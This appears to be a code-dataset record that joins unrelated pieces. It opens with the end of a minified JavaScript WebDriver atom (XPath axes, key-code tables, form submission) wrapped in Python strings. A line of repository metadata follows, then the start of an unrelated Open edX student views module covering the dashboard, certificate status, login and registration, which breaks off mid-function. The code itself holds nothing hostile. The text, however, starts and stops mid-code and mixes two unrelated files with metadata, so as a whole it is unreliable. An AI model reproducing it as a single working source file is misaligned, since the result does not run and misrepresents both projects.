"c=Math.round(c)-1;var f=Math.max(c,0);a=b.c(a);if(Infinity==d)return a."\
"substring(f);b=Math.round(d);return a.substring(f,c+b)},2,3);O(\"substr"\
"ing-after\",3,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);c=b.indexOf(a);re"\
"turn-1==c?\"\":b.substring(c+a.length)},2);\nO(\"substring-before\",3,!"\
"1,!1,function(a,b,c){b=b.c(a);a=c.c(a);a=b.indexOf(a);return-1==a?\"\":"\
"b.substring(0,a)},2);O(\"sum\",1,!1,!1,function(a,b){for(var c=L(b.eval"\
"uate(a)),d=0,f=c.next();f;f=c.next())d+=+G(f);return d},1,1,!0);O(\"tra"\
"nslate\",3,!1,!1,function(a,b,c,d){b=b.c(a);c=c.c(a);var f=d.c(a);a=[];"\
"for(d=0;d<c.length;d++){var g=c.charAt(d);g in a||(a[g]=f.charAt(d))}c="\
"\"\";for(d=0;d<b.length;d++)g=b.charAt(d),c+=g in a?a[g]:g;return c},3)"\
";O(\"true\",2,!1,!1,h(!0),0);function ma(a,b,c,d){this.m=a;this.J=b;thi"\
"s.s=c;this.Y=d}ma.prototype.toString=e(\"m\");var na={};function Q(a,b,"\
"c,d){if(a in na)throw Error(\"Axis already created: \"+a);na[a]=new ma("\
"a,b,c,!!d)}Q(\"ancestor\",function(a,b){for(var c=new J,d=b;d=d.parentN"\
"ode;)a.matches(d)&&c.unshift(d);return c},!0);Q(\"ancestor-or-self\",fu"\
"nction(a,b){var c=new J,d=b;do a.matches(d)&&c.unshift(d);while(d=d.par"\
"entNode);return c},!0);\nQ(\"attribute\",function(a,b){var c=new J,d=a."\
"getName(),f=b.attributes;if(f)if(\"*\"==d)for(var d=0,g;g=f[d];d++)c.ad"\
"d(g);else(g=f.getNamedItem(d))&&c.add(g);return c},!1);Q(\"child\",func"\
"tion(a,b,c,d,f){return fa.call(null,a,b,l(c)?c:null,l(d)?d:null,f||new "\
"J)},!1,!0);Q(\"descendant\",I,!1,!0);Q(\"descendant-or-self\",function("\
"a,b,c,d){var f=new J;H(b,c,d)&&a.matches(b)&&f.add(b);return I(a,b,c,d,"\
"f)},!1,!0);\nQ(\"following\",function(a,b,c,d){var f=new J;do for(var g"\
"=b;g=g.nextSibling;)H(g,c,d)&&a.matches(g)&&f.add(g),f=I(a,g,c,d,f);whi"\
"le(b=b.parentNode);return f},!1,!0);Q(\"following-sibling\",function(a,"\
"b){for(var c=new J,d=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c"\
"},!1);Q(\"namespace\",function(){return new J},!1);Q(\"parent\",functio"\
"n(a,b){var c=new J;if(9==b.nodeType)return c;if(2==b.nodeType)return c."\
"add(b.ownerElement),c;var d=b.parentNode;a.matches(d)&&c.add(d);return "\
"c},!1);\nQ(\"preceding\",function(a,b,c,d){var f=new J,g=[];do g.unshif"\
"t(b);while(b=b.parentNode);for(var p=1,w=g.length;p<w;p++){var z=[];for"\
"(b=g[p];b=b.previousSibling;)z.unshift(b);for(var P=0,ua=z.length;P<ua;"\
"P++)b=z[P],H(b,c,d)&&a.matches(b)&&f.add(b),f=I(a,b,c,d,f)}return f},!0"\
",!0);Q(\"preceding-sibling\",function(a,b){for(var c=new J,d=b;d=d.prev"\
"iousSibling;)a.matches(d)&&c.unshift(d);return c},!0);Q(\"self\",functi"\
"on(a,b){var c=new J;a.matches(b)&&c.add(b);return c},!1);function R(a,b"\
"){return!!a&&1==a.nodeType&&(!b||a.tagName.toUpperCase()==b)};function "\
"oa(a,b){this.p=aa.document.documentElement;this.G=null;var c;a:{var d=E"\
"(this.p);try{c=d&&d.activeElement;break a}catch(f){}c=null}c&&pa(this,c"\
");this.O=a||new qa;this.I=b||new ra}function pa(a,b){a.p=b;a.G=R(b,\"OP"\
"TION\")?F(b,function(a){return R(a,\"SELECT\")}):null}function sa(a){re"\
"turn R(a,\"FORM\")}function qa(){this.V=0}function ra(){};function S(a,"\
"b,c){this.t=a;this.u=b;this.v=c}S.prototype.create=function(a){a=E(a).c"\
"reateEvent(\"HTMLEvents\");a.initEvent(this.t,this.u,this.v);return a};"\
"S.prototype.toString=e(\"t\");var ta=new S(\"submit\",!0,!0);function T"\
"(a,b){this.i={};this.e=[];var c=arguments.length;if(1<c){if(c%2)throw E"\
"rror(\"Uneven number of arguments\");for(var d=0;d<c;d+=2)this.set(argu"\
"ments[d],arguments[d+1])}else if(a){var f;if(a instanceof T)for(d=va(a)"\
",wa(a),f=[],c=0;c<a.e.length;c++)f.push(a.i[a.e[c]]);else{var c=[],g=0;"\
"for(d in a)c[g++]=d;d=c;c=[];g=0;for(f in a)c[g++]=a[f];f=c}for(c=0;c<d"\
".length;c++)this.set(d[c],f[c])}}T.prototype.k=0;T.prototype.H=0;functi"\
"on va(a){wa(a);return a.e.concat()}\nfunction wa(a){if(a.k!=a.e.length)"\
"{for(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.prototype.hasOwnPro"\
"perty.call(a.i,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.k!=a.e.length){fo"\
"r(var f={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototype.hasOwnProperty"\
".call(f,d)||(a.e[c++]=d,f[d]=1),b++;a.e.length=c}}T.prototype.get=funct"\
"ion(a,b){return Object.prototype.hasOwnProperty.call(this.i,a)?this.i[a"\
"]:b};\nT.prototype.set=function(a,b){Object.prototype.hasOwnProperty.ca"\
"ll(this.i,a)||(this.k++,this.e.push(a),this.H++);this.i[a]=b};var U={};"\
"function V(a,b,c){var d=typeof a;(\"object\"==d&&null!=a||\"function\"="\
"=d)&&(a=a.a);a=new xa(a,b,c);!b||b in U&&!c||(U[b]={key:a,shift:!1},c&&"\
"(U[c]={key:a,shift:!0}));return a}function xa(a,b,c){this.code=a;this.w"\
"=b||null;this.W=c||this.w}V(8);V(9);V(13);var ya=V(16),za=V(17),Aa=V(18"\
");V(19);V(20);V(27);V(32,\" \");V(33);V(34);V(35);V(36);V(37);V(38);V(3"\
"9);V(40);V(44);V(45);V(46);V(48,\"0\",\")\");V(49,\"1\",\"!\");V(50,\"2"\
"\",\"@\");V(51,\"3\",\"#\");V(52,\"4\",\"$\");V(53,\"5\",\"%\");V(54,\""\
"6\",\"^\");V(55,\"7\",\"&\");\nV(56,\"8\",\"*\");V(57,\"9\",\"(\");V(65"\
",\"a\",\"A\");V(66,\"b\",\"B\");V(67,\"c\",\"C\");V(68,\"d\",\"D\");V(6"\
"9,\"e\",\"E\");V(70,\"f\",\"F\");V(71,\"g\",\"G\");V(72,\"h\",\"H\");V("\
"73,\"i\",\"I\");V(74,\"j\",\"J\");V(75,\"k\",\"K\");V(76,\"l\",\"L\");V"\
"(77,\"m\",\"M\");V(78,\"n\",\"N\");V(79,\"o\",\"O\");V(80,\"p\",\"P\");"\
"V(81,\"q\",\"Q\");V(82,\"r\",\"R\");V(83,\"s\",\"S\");V(84,\"t\",\"T\")"\
";V(85,\"u\",\"U\");V(86,\"v\",\"V\");V(87,\"w\",\"W\");V(88,\"x\",\"X\""\
");V(89,\"y\",\"Y\");V(90,\"z\",\"Z\");var Ba=V(v?{b:91,a:91,opera:219}:"\
"u?{b:224,a:91,opera:17}:{b:0,a:91,opera:null});\nV(v?{b:92,a:92,opera:2"\
"20}:u?{b:224,a:93,opera:17}:{b:0,a:92,opera:null});V(v?{b:93,a:93,opera"\
":0}:u?{b:0,a:0,opera:16}:{b:93,a:null,opera:0});V({b:96,a:96,opera:48},"\
"\"0\");V({b:97,a:97,opera:49},\"1\");V({b:98,a:98,opera:50},\"2\");V({b"\
":99,a:99,opera:51},\"3\");V({b:100,a:100,opera:52},\"4\");V({b:101,a:10"\
"1,opera:53},\"5\");V({b:102,a:102,opera:54},\"6\");V({b:103,a:103,opera"\
":55},\"7\");V({b:104,a:104,opera:56},\"8\");V({b:105,a:105,opera:57},\""\
"9\");V({b:106,a:106,opera:A?56:42},\"*\");V({b:107,a:107,opera:A?61:43}"\
",\"+\");\nV({b:109,a:109,opera:A?109:45},\"-\");V({b:110,a:110,opera:A?"\
"190:78},\".\");V({b:111,a:111,opera:A?191:47},\"/\");V(144);V(112);V(11"\
"3);V(114);V(115);V(116);V(117);V(118);V(119);V(120);V(121);V(122);V(123"\
");V({b:107,a:187,opera:61},\"=\",\"+\");V(108,\",\");V({b:109,a:189,ope"\
"ra:109},\"-\",\"_\");V(188,\",\",\"<\");V(190,\".\",\">\");V(191,\"/\","\
"\"?\");V(192,\"`\",\"~\");V(219,\"[\",\"{\");V(220,\"\\\\\",\"|\");V(22"\
"1,\"]\",\"}\");V({b:59,a:186,opera:59},\";\",\":\");V(222,\"'\",'\"');v"\
"ar W=new T;W.set(1,ya);W.set(2,za);W.set(4,Aa);W.set(8,Ba);\n(function("\
"a){var b=new T;q(va(a),function(c){b.set(a.get(c).code,c)});return b})("\
"W);function X(){oa.call(this)}m(X,oa);X.C=function(){return X.q?X.q:X.q"\
"=new X};function Ca(a){var b=F(a,sa,!0);if(!b)throw new r(7,\"Element w"\
"as not in a form, so could not submit.\");var c=X.C();pa(c,a);if(!sa(b)"\
")throw new r(12,\"Element is not a form, so could not submit.\");a=ta.c"\
"reate(b,void 0);\"isTrusted\"in a||(a.isTrusted=!1);b.dispatchEvent(a)&"\
"&(R(b.submit)?b.constructor.prototype.submit.call(b):b.submit())}var Y="\
"[\"_\"],Z=k;Y[0]in Z||!Z.execScript||Z.execScript(\"var \"+Y[0]);for(va"\
"r $;Y.length&&($=Y.shift());)Y.length||void 0===Ca?Z=Z[$]?Z[$]:Z[$]={}:"\
"Z[$]=Ca;; return this._.apply(null,arguments);}.apply({navigator:typeof"\
" window!=undefined?window.navigator:null,document:typeof window!=undefi"\
"ned?window.document:null}, arguments);}"
|
PeterWangIntel/crosswalk-webdriver-python
|
third_party/atoms.py
|
Python
|
bsd-3-clause
| 417,522
|
[
"ADF",
"ASE"
] |
3b7ef94b7bdb7f97bcc288bb9821213a8bd58a9c0d9556b49133818872895db2
|
"""
Student Views
"""
import datetime
import logging
import uuid
import json
import warnings
from collections import defaultdict
from urlparse import urljoin, urlsplit, parse_qs, urlunsplit
from django.views.generic import TemplateView
from pytz import UTC
from requests import HTTPError
from ipware.ip import get_ip
import edx_oauth2_provider
from django.conf import settings
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import password_reset_confirm
from django.contrib import messages
from django.core.context_processors import csrf
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch, reverse_lazy
from django.core.validators import validate_email, ValidationError
from django.db import IntegrityError, transaction
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError, Http404
from django.shortcuts import redirect
from django.utils.encoding import force_bytes, force_text
from django.utils.translation import ungettext
from django.utils.http import base36_to_int, urlsafe_base64_encode, urlencode
from django.utils.translation import ugettext as _, get_language
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
from django.views.decorators.http import require_POST, require_GET
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from django.template.response import TemplateResponse
from provider.oauth2.models import Client
from ratelimitbackend.exceptions import RateLimitException
from social.apps.django_app import utils as social_utils
from social.backends import oauth as social_oauth
from social.exceptions import AuthException, AuthAlreadyAssociated
from edxmako.shortcuts import render_to_response, render_to_string
from course_modes.models import CourseMode
from shoppingcart.api import order_history
from student.models import (
Registration, UserProfile,
PendingEmailChange, CourseEnrollment, CourseEnrollmentAttribute, unique_id_for_user,
CourseEnrollmentAllowed, UserStanding, LoginFailures,
create_comments_service_user, PasswordHistory, UserSignupSource,
DashboardConfiguration, LinkedInAddToProfileConfiguration, ManualEnrollmentAudit, ALLOWEDTOENROLL_TO_ENROLLED,
LogoutViewConfiguration, RegistrationCookieConfiguration)
from student.forms import AccountCreationForm, PasswordResetFormNoActive, get_registration_extension_form
from lms.djangoapps.commerce.utils import EcommerceService # pylint: disable=import-error
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification # pylint: disable=import-error
from bulk_email.models import Optout, BulkEmailFlag # pylint: disable=import-error
from certificates.models import CertificateStatuses, certificate_status_for_student
from certificates.api import ( # pylint: disable=import-error
get_certificate_url,
has_html_certificates_enabled,
)
from xmodule.modulestore.django import modulestore
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys.edx.locator import CourseLocator
from collections import namedtuple
from courseware.courses import get_courses, sort_by_announcement, sort_by_start_date # pylint: disable=import-error
from courseware.access import has_access
from django_comment_common.models import Role
from openedx.core.djangoapps.external_auth.models import ExternalAuthMap
import openedx.core.djangoapps.external_auth.views
from openedx.core.djangoapps.external_auth.login_and_register import (
login as external_auth_login,
register as external_auth_register
)
import track.views
import dogstats_wrapper as dog_stats_api
from util.db import outer_atomic
from util.json_request import JsonResponse
from util.bad_request_rate_limiter import BadRequestRateLimiter
from util.milestones_helpers import (
get_pre_requisite_courses_not_completed,
)
from util.password_policy_validators import validate_password_strength
import third_party_auth
from third_party_auth import pipeline, provider
from student.helpers import (
check_verify_status_by_course,
auth_pipeline_urls, get_next_url_for_login_page,
DISABLE_UNENROLL_CERT_STATES,
destroy_oauth_tokens
)
from student.cookies import set_logged_in_cookies, delete_logged_in_cookies
from student.models import anonymous_id_for_user, UserAttribute, EnrollStatusChange
from shoppingcart.models import DonationConfiguration, CourseRegistrationCode
from embargo import api as embargo_api
import analytics
from eventtracking import tracker
# Note that this lives in LMS, so this dependency should be refactored.
from notification_prefs.views import enable_notifications
from openedx.core.djangoapps.credit.email_utils import get_credit_provider_display_names, make_providers_strings
from openedx.core.djangoapps.lang_pref import LANGUAGE_KEY
from openedx.core.djangoapps.programs import utils as programs_utils
from openedx.core.djangoapps.programs.models import ProgramsApiConfig
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.theming import helpers as theming_helpers
from openedx.core.djangoapps.user_api.preferences import api as preferences_api
log = logging.getLogger("edx.student")
AUDIT_LOG = logging.getLogger("audit")
ReverifyInfo = namedtuple('ReverifyInfo', 'course_id course_name course_number date status display') # pylint: disable=invalid-name
SETTING_CHANGE_INITIATED = 'edx.user.settings.change_initiated'
# Used as the name of the user attribute for tracking affiliate registrations
REGISTRATION_AFFILIATE_ID = 'registration_affiliate_id'
REGISTRATION_UTM_PARAMETERS = {
'utm_source': 'registration_utm_source',
'utm_medium': 'registration_utm_medium',
'utm_campaign': 'registration_utm_campaign',
'utm_term': 'registration_utm_term',
'utm_content': 'registration_utm_content',
}
REGISTRATION_UTM_CREATED_AT = 'registration_utm_created_at'
# used to announce a registration
REGISTER_USER = Signal(providing_args=["user", "profile"])
# Disable this warning because it doesn't make sense to completely refactor tests to appease Pylint
# pylint: disable=logging-format-interpolation
def csrf_token(context):
"""A csrf token that can be included in a form."""
token = context.get('csrf_token', '')
if token == 'NOTPROVIDED':
return ''
return (u'<div style="display:none"><input type="hidden"'
' name="csrfmiddlewaretoken" value="%s" /></div>' % (token))
# NOTE: This view is not linked to directly--it is called from
# branding/views.py:index(), which is cached for anonymous users.
# This means that it should always return the same thing for anon
# users. (in particular, no switching based on query params allowed)
def index(request, extra_context=None, user=AnonymousUser()):
"""
Render the edX main page.
extra_context is used to allow immediate display of certain modal windows, eg signup,
as used by external_auth.
"""
if extra_context is None:
extra_context = {}
courses = get_courses(user)
if configuration_helpers.get_value(
"ENABLE_COURSE_SORTING_BY_START_DATE",
settings.FEATURES["ENABLE_COURSE_SORTING_BY_START_DATE"],
):
courses = sort_by_start_date(courses)
else:
courses = sort_by_announcement(courses)
context = {'courses': courses}
context['homepage_overlay_html'] = configuration_helpers.get_value('homepage_overlay_html')
# This appears to be an unused context parameter, at least for the master templates...
context['show_partners'] = configuration_helpers.get_value('show_partners', True)
# TO DISPLAY A YOUTUBE WELCOME VIDEO
# 1) Change False to True
context['show_homepage_promo_video'] = configuration_helpers.get_value('show_homepage_promo_video', False)
# 2) Add your video's YouTube ID (11 chars, eg "123456789xX"), or specify via site configuration
# Note: This value should be moved into a configuration setting and plumbed-through to the
# context via the site configuration workflow, versus living here
youtube_video_id = configuration_helpers.get_value('homepage_promo_video_youtube_id', "your-youtube-id")
context['homepage_promo_video_youtube_id'] = youtube_video_id
# allow for theme override of the courses list
context['courses_list'] = theming_helpers.get_template_path('courses_list.html')
# Insert additional context for use in the template
context.update(extra_context)
return render_to_response('index.html', context)
def process_survey_link(survey_link, user):
"""
If {UNIQUE_ID} appears in the link, replace it with a unique id for the user.
Currently, this is sha1(user.username). Otherwise, return survey_link.
"""
return survey_link.format(UNIQUE_ID=unique_id_for_user(user))
def cert_info(user, course_overview, course_mode):
"""
Get the certificate info needed to render the dashboard section for the given
student and course.
Arguments:
user (User): A user.
course_overview (CourseOverview): A course.
course_mode (str): The enrollment mode (honor, verified, audit, etc.)
Returns:
dict: Empty dict if certificates are disabled or hidden, or a dictionary with keys:
'status': one of 'generating', 'ready', 'notpassing', 'processing', 'restricted'
'show_download_url': bool
'download_url': url, only present if show_download_url is True
'show_disabled_download_button': bool -- true if state is 'generating'
'show_survey_button': bool
'survey_url': url, only if show_survey_button is True
'grade': if status is not 'processing'
'can_unenroll': if status allows for unenrollment
"""
if not course_overview.may_certify():
return {}
return _cert_info(
user,
course_overview,
certificate_status_for_student(user, course_overview.id),
course_mode
)
def reverification_info(statuses):
"""
Returns reverification-related information for *all* of user's enrollments whose
reverification status is in statuses.
Args:
statuses (list): a list of reverification statuses we want information for
example: ["must_reverify", "denied"]
Returns:
dictionary of lists: dictionary with one key per status, e.g.
dict["must_reverify"] = []
dict["must_reverify"] = [some information]
"""
reverifications = defaultdict(list)
# Sort the data by the reverification_end_date
for status in statuses:
if reverifications[status]:
reverifications[status].sort(key=lambda x: x.date)
return reverifications
def get_course_enrollments(user, org_to_include, orgs_to_exclude):
"""
Given a user, return a filtered set of his or her course enrollments.
Arguments:
user (User): the user in question.
org_to_include (str): If not None, ONLY courses of this org will be returned.
orgs_to_exclude (list[str]): If org_to_include is not None, this
argument is ignored. Else, courses of this org will be excluded.
Returns:
generator[CourseEnrollment]: a sequence of enrollments to be displayed
on the user's dashboard.
"""
for enrollment in CourseEnrollment.enrollments_for_user(user):
# If the course is missing or broken, log an error and skip it.
course_overview = enrollment.course_overview
if not course_overview:
log.error(
"User %s enrolled in broken or non-existent course %s",
user.username,
enrollment.course_id
)
continue
# Filter out anything that is not attributed to the current ORG.
if org_to_include and course_overview.location.org != org_to_include:
continue
# Conversely, filter out any enrollments with courses attributed to current ORG.
elif course_overview.location.org in orgs_to_exclude:
continue
# Else, include the enrollment.
else:
yield enrollment
def _cert_info(user, course_overview, cert_status, course_mode): # pylint: disable=unused-argument
"""
Implements the logic for cert_info -- split out for testing.
Arguments:
user (User): A user.
course_overview (CourseOverview): A course.
course_mode (str): The enrollment mode (honor, verified, audit, etc.)
"""
# simplify the status for the template using this lookup table
template_state = {
CertificateStatuses.generating: 'generating',
CertificateStatuses.downloadable: 'ready',
CertificateStatuses.notpassing: 'notpassing',
CertificateStatuses.restricted: 'restricted',
CertificateStatuses.auditing: 'auditing',
CertificateStatuses.audit_passing: 'auditing',
CertificateStatuses.audit_notpassing: 'auditing',
CertificateStatuses.unverified: 'unverified',
}
default_status = 'processing'
default_info = {
'status': default_status,
'show_disabled_download_button': False,
'show_download_url': False,
'show_survey_button': False,
'can_unenroll': True,
}
if cert_status is None:
return default_info
is_hidden_status = cert_status['status'] in ('unavailable', 'processing', 'generating', 'notpassing', 'auditing')
if course_overview.certificates_display_behavior == 'early_no_info' and is_hidden_status:
return {}
status = template_state.get(cert_status['status'], default_status)
status_dict = {
'status': status,
'show_download_url': status == 'ready',
'show_disabled_download_button': status == 'generating',
'mode': cert_status.get('mode', None),
'linked_in_url': None,
'can_unenroll': status not in DISABLE_UNENROLL_CERT_STATES,
}
if (status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified') and
course_overview.end_of_course_survey_url is not None):
status_dict.update({
'show_survey_button': True,
'survey_url': process_survey_link(course_overview.end_of_course_survey_url, user)})
else:
status_dict['show_survey_button'] = False
if status == 'ready':
# showing the certificate web view button if certificate is ready state and feature flags are enabled.
if has_html_certificates_enabled(course_overview.id, course_overview):
if course_overview.has_any_active_web_certificate:
status_dict.update({
'show_cert_web_view': True,
'cert_web_view_url': get_certificate_url(course_id=course_overview.id, uuid=cert_status['uuid'])
})
else:
# don't show download certificate button if we don't have an active certificate for course
status_dict['show_download_url'] = False
elif 'download_url' not in cert_status:
log.warning(
u"User %s has a downloadable cert for %s, but no download url",
user.username,
course_overview.id
)
return default_info
else:
status_dict['download_url'] = cert_status['download_url']
# If enabled, show the LinkedIn "add to profile" button
# Clicking this button sends the user to LinkedIn where they
# can add the certificate information to their profile.
linkedin_config = LinkedInAddToProfileConfiguration.current()
# posting certificates to LinkedIn is not currently
# supported in White Labels
if linkedin_config.enabled and not theming_helpers.is_request_in_themed_site():
status_dict['linked_in_url'] = linkedin_config.add_to_profile_url(
course_overview.id,
course_overview.display_name,
cert_status.get('mode'),
cert_status['download_url']
)
if status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified'):
if 'grade' not in cert_status:
# Note: as of 11/20/2012, we know there are students in this state-- cs169.1x,
# who need to be regraded (we weren't tracking 'notpassing' at first).
# We can add a log.warning here once we think it shouldn't happen.
return default_info
else:
status_dict['grade'] = cert_status['grade']
return status_dict
@ensure_csrf_cookie
def signin_user(request):
"""Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`."""
external_auth_response = external_auth_login(request)
if external_auth_response is not None:
return external_auth_response
# Determine the URL to redirect to following login:
redirect_to = get_next_url_for_login_page(request)
if request.user.is_authenticated():
return redirect(redirect_to)
third_party_auth_error = None
for msg in messages.get_messages(request):
if msg.extra_tags.split()[0] == "social-auth":
# msg may or may not be translated. Try translating [again] in case we are able to:
third_party_auth_error = _(unicode(msg)) # pylint: disable=translation-of-non-string
break
context = {
'login_redirect_url': redirect_to, # This gets added to the query string of the "Sign In" button in the header
# Bool injected into JS to submit form if we're inside a running third-
# party auth pipeline; distinct from the actual instance of the running
# pipeline, if any.
'pipeline_running': 'true' if pipeline.running(request) else 'false',
'pipeline_url': auth_pipeline_urls(pipeline.AUTH_ENTRY_LOGIN, redirect_url=redirect_to),
'platform_name': configuration_helpers.get_value(
'platform_name',
settings.PLATFORM_NAME
),
'third_party_auth_error': third_party_auth_error
}
return render_to_response('login.html', context)
@ensure_csrf_cookie
def register_user(request, extra_context=None):
"""Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`."""
# Determine the URL to redirect to following login:
redirect_to = get_next_url_for_login_page(request)
if request.user.is_authenticated():
return redirect(redirect_to)
external_auth_response = external_auth_register(request)
if external_auth_response is not None:
return external_auth_response
context = {
'login_redirect_url': redirect_to, # This gets added to the query string of the "Sign In" button in the header
'email': '',
'name': '',
'running_pipeline': None,
'pipeline_urls': auth_pipeline_urls(pipeline.AUTH_ENTRY_REGISTER, redirect_url=redirect_to),
'platform_name': configuration_helpers.get_value(
'platform_name',
settings.PLATFORM_NAME
),
'selected_provider': '',
'username': '',
}
if extra_context is not None:
context.update(extra_context)
if context.get("extauth_domain", '').startswith(
openedx.core.djangoapps.external_auth.views.SHIBBOLETH_DOMAIN_PREFIX
):
return render_to_response('register-shib.html', context)
# If third-party auth is enabled, prepopulate the form with data from the
# selected provider.
if third_party_auth.is_enabled() and pipeline.running(request):
running_pipeline = pipeline.get(request)
current_provider = provider.Registry.get_from_pipeline(running_pipeline)
if current_provider is not None:
overrides = current_provider.get_register_form_data(running_pipeline.get('kwargs'))
overrides['running_pipeline'] = running_pipeline
overrides['selected_provider'] = current_provider.name
context.update(overrides)
return render_to_response('register.html', context)
def complete_course_mode_info(course_id, enrollment, modes=None):
"""
We would like to compute some more information from the given course modes
and the user's current enrollment
Returns the given information:
- whether to show the course upsell information
- numbers of days until they can't upsell anymore
"""
if modes is None:
modes = CourseMode.modes_for_course_dict(course_id)
mode_info = {'show_upsell': False, 'days_for_upsell': None}
# we want to know if the user is already enrolled as verified or credit and
# if verified is an option.
if CourseMode.VERIFIED in modes and enrollment.mode in CourseMode.UPSELL_TO_VERIFIED_MODES:
mode_info['show_upsell'] = True
mode_info['verified_sku'] = modes['verified'].sku
mode_info['verified_bulk_sku'] = modes['verified'].bulk_sku
# if there is an expiration date, find out how long from now it is
if modes['verified'].expiration_datetime:
today = datetime.datetime.now(UTC).date()
mode_info['days_for_upsell'] = (modes['verified'].expiration_datetime.date() - today).days
return mode_info
def is_course_blocked(request, redeemed_registration_codes, course_key):
"""Checking either registration is blocked or not ."""
blocked = False
for redeemed_registration in redeemed_registration_codes:
# registration codes may be generated via Bulk Purchase Scenario
# we have to check only for the invoice generated registration codes
# that their invoice is valid or not
if redeemed_registration.invoice_item:
if not redeemed_registration.invoice_item.invoice.is_valid:
blocked = True
# disabling email notifications for unpaid registration courses
Optout.objects.get_or_create(user=request.user, course_id=course_key)
log.info(
u"User %s (%s) opted out of receiving emails from course %s",
request.user.username,
request.user.email,
course_key,
)
track.views.server_track(
request,
"change-email1-settings",
{"receive_emails": "no", "course": course_key.to_deprecated_string()},
page='dashboard',
)
break
return blocked
@login_required
@ensure_csrf_cookie
def dashboard(request):
"""
Provides the LMS dashboard view
TODO: This is lms specific and does not belong in common code.
Arguments:
request: The request object.
Returns:
The dashboard response.
"""
user = request.user
platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)
# we want to filter and only show enrollments for courses within
# the 'ORG' defined in configuration.
course_org_filter = configuration_helpers.get_value('course_org_filter')
# Let's filter out any courses in an "org" that has been declared to be
# in a configuration
org_filter_out_set = configuration_helpers.get_all_orgs()
# remove our current org from the "filter out" list, if applicable
if course_org_filter:
org_filter_out_set.remove(course_org_filter)
# Build our (course, enrollment) list for the user, but ignore any courses that no
# longer exist (because the course IDs have changed). Still, we don't delete those
# enrollments, because it could have been a data push snafu.
course_enrollments = list(get_course_enrollments(user, course_org_filter, org_filter_out_set))
# sort the enrollment pairs by the enrollment date
course_enrollments.sort(key=lambda x: x.created, reverse=True)
# Retrieve the course modes for each course
enrolled_course_ids = [enrollment.course_id for enrollment in course_enrollments]
__, unexpired_course_modes = CourseMode.all_and_unexpired_modes_for_courses(enrolled_course_ids)
course_modes_by_course = {
course_id: {
mode.slug: mode
for mode in modes
}
for course_id, modes in unexpired_course_modes.iteritems()
}
# Check to see if the student has recently enrolled in a course.
# If so, display a notification message confirming the enrollment.
enrollment_message = _create_recent_enrollment_message(
course_enrollments, course_modes_by_course
)
course_optouts = Optout.objects.filter(user=user).values_list('course_id', flat=True)
message = ""
if not user.is_active:
message = render_to_string(
'registration/activate_account_notice.html',
{'email': user.email, 'platform_name': platform_name}
)
# Global staff can see what courses errored on their dashboard
staff_access = False
errored_courses = {}
if has_access(user, 'staff', 'global'):
# Show any courses that errored on load
staff_access = True
errored_courses = modulestore().get_errored_courses()
show_courseware_links_for = frozenset(
enrollment.course_id for enrollment in course_enrollments
if has_access(request.user, 'load', enrollment.course_overview)
and has_access(request.user, 'view_courseware_with_prerequisites', enrollment.course_overview)
)
# Find programs associated with courses being displayed. This information
# is passed in the template context to allow rendering of program-related
# information on the dashboard.
meter = programs_utils.ProgramProgressMeter(user, enrollments=course_enrollments)
programs_by_run = meter.engaged_programs(by_run=True)
# Construct a dictionary of course mode information
# used to render the course list. We re-use the course modes dict
# we loaded earlier to avoid hitting the database.
course_mode_info = {
enrollment.course_id: complete_course_mode_info(
enrollment.course_id, enrollment,
modes=course_modes_by_course[enrollment.course_id]
)
for enrollment in course_enrollments
}
# Determine the per-course verification status
# This is a dictionary in which the keys are course locators
# and the values are one of:
#
# VERIFY_STATUS_NEED_TO_VERIFY
# VERIFY_STATUS_SUBMITTED
# VERIFY_STATUS_APPROVED
# VERIFY_STATUS_MISSED_DEADLINE
#
# Each of which correspond to a particular message to display
# next to the course on the dashboard.
#
# If a course is not included in this dictionary,
# there is no verification messaging to display.
verify_status_by_course = check_verify_status_by_course(user, course_enrollments)
cert_statuses = {
enrollment.course_id: cert_info(request.user, enrollment.course_overview, enrollment.mode)
for enrollment in course_enrollments
}
# only show email settings for Mongo course and when bulk email is turned on
show_email_settings_for = frozenset(
enrollment.course_id for enrollment in course_enrollments if (
BulkEmailFlag.feature_enabled(enrollment.course_id)
)
)
# Verification Attempts
# Used to generate the "you must reverify for course x" banner
verification_status, verification_msg = SoftwareSecurePhotoVerification.user_status(user)
# Gets data for midcourse reverifications, if any are necessary or have failed
statuses = ["approved", "denied", "pending", "must_reverify"]
reverifications = reverification_info(statuses)
show_refund_option_for = frozenset(
enrollment.course_id for enrollment in course_enrollments
if enrollment.refundable()
)
block_courses = frozenset(
enrollment.course_id for enrollment in course_enrollments
if is_course_blocked(
request,
CourseRegistrationCode.objects.filter(
course_id=enrollment.course_id,
registrationcoderedemption__redeemed_by=request.user
),
enrollment.course_id
)
)
enrolled_courses_either_paid = frozenset(
enrollment.course_id for enrollment in course_enrollments
if enrollment.is_paid_course()
)
# If there are *any* denied reverifications that have not been toggled off,
# we'll display the banner
denied_banner = any(item.display for item in reverifications["denied"])
# Populate the Order History for the side-bar.
order_history_list = order_history(user, course_org_filter=course_org_filter, org_filter_out_set=org_filter_out_set)
# get list of courses having pre-requisites yet to be completed
courses_having_prerequisites = frozenset(
enrollment.course_id for enrollment in course_enrollments
if enrollment.course_overview.pre_requisite_courses
)
courses_requirements_not_met = get_pre_requisite_courses_not_completed(user, courses_having_prerequisites)
if 'notlive' in request.GET:
redirect_message = _("The course you are looking for does not start until {date}.").format(
date=request.GET['notlive']
)
elif 'course_closed' in request.GET:
